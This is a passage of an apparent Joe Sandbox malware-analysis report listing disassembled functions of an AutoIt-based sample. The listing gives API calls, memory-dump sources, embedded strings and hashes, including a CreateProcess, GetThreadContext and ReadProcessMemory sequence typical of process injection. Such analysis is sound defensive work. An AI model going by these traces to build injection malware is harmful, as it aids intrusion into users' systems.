                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentTerminate
                                                                                                • String ID: #v
                                                                                                • API String ID: 2429186680-554117064
                                                                                                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                Function 040D22A8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 040D2A63
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D2AF9
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D2B1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 2438371351-0
                                                                                                • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                • Instruction ID: b33d37d37480c53a3f5f63b838c2444d0cf7811c245399c3593a330ff3f17c5d
                                                                                                • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                                • Instruction Fuzzy Hash: 9362FB30A142589BEB24CFA4C850BDEB376EF58300F1091A9D10DFB294E7769E85CB5A
                                                                                                Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: Error:
                                                                                                • API String ID: 4104443479-232661952
                                                                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                • String ID: X$pWH
                                                                                                • API String ID: 85490731-941433119
                                                                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • _memmove.LIBCMT ref: 00401B57
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                • String ID: @EXITCODE
                                                                                                • API String ID: 2734553683-3436989551
                                                                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 1794320848-0
                                                                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconNotifyShell_
                                                                                                • String ID:
                                                                                                • API String ID: 1144537725-0
                                                                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0043214B
                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                • _malloc.LIBCMT ref: 0043215D
                                                                                                • _malloc.LIBCMT ref: 0043216F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 680241177-0
                                                                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                • _free.LIBCMT ref: 004295A0
                                                                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                • API String ID: 3938964917-2806939583
                                                                                                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strcat
                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                • API String ID: 1765576173-2684727018
                                                                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__wsplitpath_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 4163294574-0
                                                                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                • _strcat.LIBCMT ref: 0040F786
                                                                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3199840319-0
                                                                                                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
